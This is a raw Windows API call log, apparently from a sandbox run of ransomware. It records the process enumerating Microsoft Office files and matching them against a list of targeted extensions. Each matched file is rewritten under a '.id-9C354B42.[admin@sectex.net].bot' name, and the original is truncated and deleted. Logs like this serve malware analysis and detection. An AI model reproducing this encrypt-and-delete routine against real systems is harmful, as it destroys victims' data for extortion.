	[0153.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK") returned 67
	[0153.238] lstrlenW (lpString=".jpg") returned 4
	[0153.238] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.238] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0153.238] lstrlenW (lpString="VISIO_STD_F_COL.HXK") returned 19
	[0153.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0153.326] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=114) returned 1
	[0153.326] CloseHandle (hObject=0x3ac) returned 1
	[0153.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_f_col.hxk")) returned 0x20
	[0153.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0153.326] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.326] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0153.327] GetLastError () returned 0x0
	[0153.327] ReadFile (in: hFile=0x3ac, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x72, lpOverlapped=0x0) returned 1
	[0153.328] WriteFile (in: hFile=0x388, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0153.329] ReadFile (in: hFile=0x3ac, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.329] WriteFile (in: hFile=0x388, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0153.329] SetEndOfFile (hFile=0x388) returned 1
	[0153.329] CloseHandle (hObject=0x388) returned 1
	[0153.329] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.329] SetEndOfFile (hFile=0x3ac) returned 1
	[0153.331] CloseHandle (hObject=0x3ac) returned 1
	[0153.331] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.332] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_f_col.hxk")) returned 1
	[0153.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK") returned 67
	[0153.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK") returned 67
	[0153.332] lstrlenW (lpString=".doc") returned 4
	[0153.332] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.332] lstrlenW (lpString=".docx") returned 5
	[0153.332] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.332] lstrlenW (lpString=".pdf") returned 4
	[0153.332] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.332] lstrlenW (lpString=".xls") returned 4
	[0153.332] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.332] lstrlenW (lpString=".xlsx") returned 5
	[0153.332] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.332] lstrlenW (lpString=".ppt") returned 4
	[0153.333] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK") returned 67
	[0153.333] lstrlenW (lpString=".zip") returned 4
	[0153.333] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.333] lstrlenW (lpString=".rar") returned 4
	[0153.333] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.333] lstrlenW (lpString=".bz2") returned 4
	[0153.333] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.333] lstrlenW (lpString=".7z") returned 3
	[0153.333] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK") returned 67
	[0153.333] lstrlenW (lpString=".dbf") returned 4
	[0153.333] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK") returned 67
	[0153.333] lstrlenW (lpString=".1cd") returned 4
	[0153.333] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK") returned 67
	[0153.333] lstrlenW (lpString=".jpg") returned 4
	[0153.333] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK") returned 67
	[0153.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK") returned 67
	[0153.333] lstrlenW (lpString=".doc") returned 4
	[0153.333] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.333] lstrlenW (lpString=".docx") returned 5
	[0153.333] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.333] lstrlenW (lpString=".pdf") returned 4
	[0153.333] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.333] lstrlenW (lpString=".xls") returned 4
	[0153.333] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.334] lstrlenW (lpString=".xlsx") returned 5
	[0153.334] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.334] lstrlenW (lpString=".ppt") returned 4
	[0153.334] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK") returned 67
	[0153.334] lstrlenW (lpString=".zip") returned 4
	[0153.334] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.334] lstrlenW (lpString=".rar") returned 4
	[0153.334] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.334] lstrlenW (lpString=".bz2") returned 4
	[0153.334] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.334] lstrlenW (lpString=".7z") returned 3
	[0153.334] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK") returned 67
	[0153.334] lstrlenW (lpString=".dbf") returned 4
	[0153.334] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK") returned 67
	[0153.334] lstrlenW (lpString=".1cd") returned 4
	[0153.334] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK") returned 67
	[0153.334] lstrlenW (lpString=".jpg") returned 4
	[0153.334] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.334] lstrcmpiW (lpString1=".vsdir", lpString2=".bot") returned 1
	[0153.334] lstrlenW (lpString="Visfilem.vsdir") returned 14
	[0153.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\vsdir\\visfilem.vsdir"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0153.335] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=153) returned 1
	[0153.335] CloseHandle (hObject=0x3ac) returned 1
	[0153.335] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\vsdir\\visfilem.vsdir")) returned 0x20
	[0153.335] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\vsdir\\visfilem.vsdir.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\vsdir\\visfilem.vsdir"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0153.336] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.336] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.336] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\vsdir\\visfilem.vsdir.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0153.339] GetLastError () returned 0x0
	[0153.339] ReadFile (in: hFile=0x3ac, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x99, lpOverlapped=0x0) returned 1
	[0153.340] WriteFile (in: hFile=0x3f0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xa0, lpOverlapped=0x0) returned 1
	[0153.341] ReadFile (in: hFile=0x3ac, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.341] WriteFile (in: hFile=0x3f0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0153.341] SetEndOfFile (hFile=0x3f0) returned 1
	[0153.341] CloseHandle (hObject=0x3f0) returned 1
	[0153.341] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.341] SetEndOfFile (hFile=0x3ac) returned 1
	[0153.346] CloseHandle (hObject=0x3ac) returned 1
	[0153.346] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.346] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\vsdir\\visfilem.vsdir")) returned 1
	[0153.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir") returned 68
	[0153.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir") returned 68
	[0153.347] lstrlenW (lpString=".doc") returned 4
	[0153.347] lstrcmpiW (lpString1=".doc", lpString2="sdir") returned -1
	[0153.347] lstrlenW (lpString=".docx") returned 5
	[0153.347] lstrcmpiW (lpString1=".docx", lpString2="vsdir") returned -1
	[0153.347] lstrlenW (lpString=".pdf") returned 4
	[0153.347] lstrcmpiW (lpString1=".pdf", lpString2="sdir") returned -1
	[0153.347] lstrlenW (lpString=".xls") returned 4
	[0153.347] lstrcmpiW (lpString1=".xls", lpString2="sdir") returned -1
	[0153.347] lstrlenW (lpString=".xlsx") returned 5
	[0153.347] lstrcmpiW (lpString1=".xlsx", lpString2="vsdir") returned -1
	[0153.347] lstrlenW (lpString=".ppt") returned 4
	[0153.347] lstrcmpiW (lpString1=".ppt", lpString2="sdir") returned -1
	[0153.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir") returned 68
	[0153.347] lstrlenW (lpString=".zip") returned 4
	[0153.347] lstrcmpiW (lpString1=".zip", lpString2="sdir") returned -1
	[0153.347] lstrlenW (lpString=".rar") returned 4
	[0153.347] lstrcmpiW (lpString1=".rar", lpString2="sdir") returned -1
	[0153.347] lstrlenW (lpString=".bz2") returned 4
	[0153.347] lstrcmpiW (lpString1=".bz2", lpString2="sdir") returned -1
	[0153.347] lstrlenW (lpString=".7z") returned 3
	[0153.348] lstrcmpiW (lpString1=".7z", lpString2="dir") returned -1
	[0153.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir") returned 68
	[0153.348] lstrlenW (lpString=".dbf") returned 4
	[0153.348] lstrcmpiW (lpString1=".dbf", lpString2="sdir") returned -1
	[0153.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir") returned 68
	[0153.348] lstrlenW (lpString=".1cd") returned 4
	[0153.348] lstrcmpiW (lpString1=".1cd", lpString2="sdir") returned -1
	[0153.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir") returned 68
	[0153.348] lstrlenW (lpString=".jpg") returned 4
	[0153.348] lstrcmpiW (lpString1=".jpg", lpString2="sdir") returned -1
	[0153.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir") returned 68
	[0153.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir") returned 68
	[0153.348] lstrlenW (lpString=".doc") returned 4
	[0153.348] lstrcmpiW (lpString1=".doc", lpString2="sdir") returned -1
	[0153.348] lstrlenW (lpString=".docx") returned 5
	[0153.348] lstrcmpiW (lpString1=".docx", lpString2="vsdir") returned -1
	[0153.348] lstrlenW (lpString=".pdf") returned 4
	[0153.348] lstrcmpiW (lpString1=".pdf", lpString2="sdir") returned -1
	[0153.348] lstrlenW (lpString=".xls") returned 4
	[0153.348] lstrcmpiW (lpString1=".xls", lpString2="sdir") returned -1
	[0153.348] lstrlenW (lpString=".xlsx") returned 5
	[0153.348] lstrcmpiW (lpString1=".xlsx", lpString2="vsdir") returned -1
	[0153.348] lstrlenW (lpString=".ppt") returned 4
	[0153.348] lstrcmpiW (lpString1=".ppt", lpString2="sdir") returned -1
	[0153.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir") returned 68
	[0153.348] lstrlenW (lpString=".zip") returned 4
	[0153.348] lstrcmpiW (lpString1=".zip", lpString2="sdir") returned -1
	[0153.348] lstrlenW (lpString=".rar") returned 4
	[0153.348] lstrcmpiW (lpString1=".rar", lpString2="sdir") returned -1
	[0153.348] lstrlenW (lpString=".bz2") returned 4
	[0153.349] lstrcmpiW (lpString1=".bz2", lpString2="sdir") returned -1
	[0153.349] lstrlenW (lpString=".7z") returned 3
	[0153.349] lstrcmpiW (lpString1=".7z", lpString2="dir") returned -1
	[0153.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir") returned 68
	[0153.349] lstrlenW (lpString=".dbf") returned 4
	[0153.349] lstrcmpiW (lpString1=".dbf", lpString2="sdir") returned -1
	[0153.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir") returned 68
	[0153.349] lstrlenW (lpString=".1cd") returned 4
	[0153.349] lstrcmpiW (lpString1=".1cd", lpString2="sdir") returned -1
	[0153.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir") returned 68
	[0153.349] lstrlenW (lpString=".jpg") returned 4
	[0153.349] lstrcmpiW (lpString1=".jpg", lpString2="sdir") returned -1
	[0153.349] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0153.349] lstrlenW (lpString="VVIEWRES.DLL") returned 12
	[0153.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\vviewres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.486] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=668544) returned 1
	[0153.486] CloseHandle (hObject=0x3dc) returned 1
	[0153.486] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\vviewres.dll")) returned 0x20
	[0153.486] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\vviewres.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\vviewres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0153.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL") returned 60
	[0153.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL") returned 60
	[0153.487] lstrlenW (lpString=".doc") returned 4
	[0153.487] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0153.487] lstrlenW (lpString=".docx") returned 5
	[0153.487] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0153.487] lstrlenW (lpString=".pdf") returned 4
	[0153.487] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0153.487] lstrlenW (lpString=".xls") returned 4
	[0153.487] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0153.487] lstrlenW (lpString=".xlsx") returned 5
	[0153.487] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0153.487] lstrlenW (lpString=".ppt") returned 4
	[0153.487] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0153.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL") returned 60
	[0153.487] lstrlenW (lpString=".zip") returned 4
	[0153.487] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0153.487] lstrlenW (lpString=".rar") returned 4
	[0153.487] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0153.487] lstrlenW (lpString=".bz2") returned 4
	[0153.487] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0153.487] lstrlenW (lpString=".7z") returned 3
	[0153.487] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0153.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL") returned 60
	[0153.487] lstrlenW (lpString=".dbf") returned 4
	[0153.487] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0153.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL") returned 60
	[0153.487] lstrlenW (lpString=".1cd") returned 4
	[0153.488] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0153.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL") returned 60
	[0153.488] lstrlenW (lpString=".jpg") returned 4
	[0153.488] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0153.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL") returned 60
	[0153.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL") returned 60
	[0153.488] lstrlenW (lpString=".doc") returned 4
	[0153.488] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0153.488] lstrlenW (lpString=".docx") returned 5
	[0153.488] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0153.488] lstrlenW (lpString=".pdf") returned 4
	[0153.488] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0153.488] lstrlenW (lpString=".xls") returned 4
	[0153.488] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0153.488] lstrlenW (lpString=".xlsx") returned 5
	[0153.488] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0153.488] lstrlenW (lpString=".ppt") returned 4
	[0153.488] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0153.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL") returned 60
	[0153.488] lstrlenW (lpString=".zip") returned 4
	[0153.488] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0153.488] lstrlenW (lpString=".rar") returned 4
	[0153.488] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0153.488] lstrlenW (lpString=".bz2") returned 4
	[0153.488] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0153.488] lstrlenW (lpString=".7z") returned 3
	[0153.488] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0153.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL") returned 60
	[0153.488] lstrlenW (lpString=".dbf") returned 4
	[0153.488] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0153.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL") returned 60
	[0153.489] lstrlenW (lpString=".1cd") returned 4
	[0153.489] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0153.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL") returned 60
	[0153.489] lstrlenW (lpString=".jpg") returned 4
	[0153.489] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0153.489] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0153.489] lstrlenW (lpString="WDALLLNK.VRD") returned 12
	[0153.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wdalllnk.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0153.527] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=1940) returned 1
	[0153.527] CloseHandle (hObject=0x38c) returned 1
	[0153.527] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wdalllnk.vrd")) returned 0x20
	[0153.536] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wdalllnk.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wdalllnk.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0153.536] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.536] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wdalllnk.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0153.537] GetLastError () returned 0x0
	[0153.537] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x794, lpOverlapped=0x0) returned 1
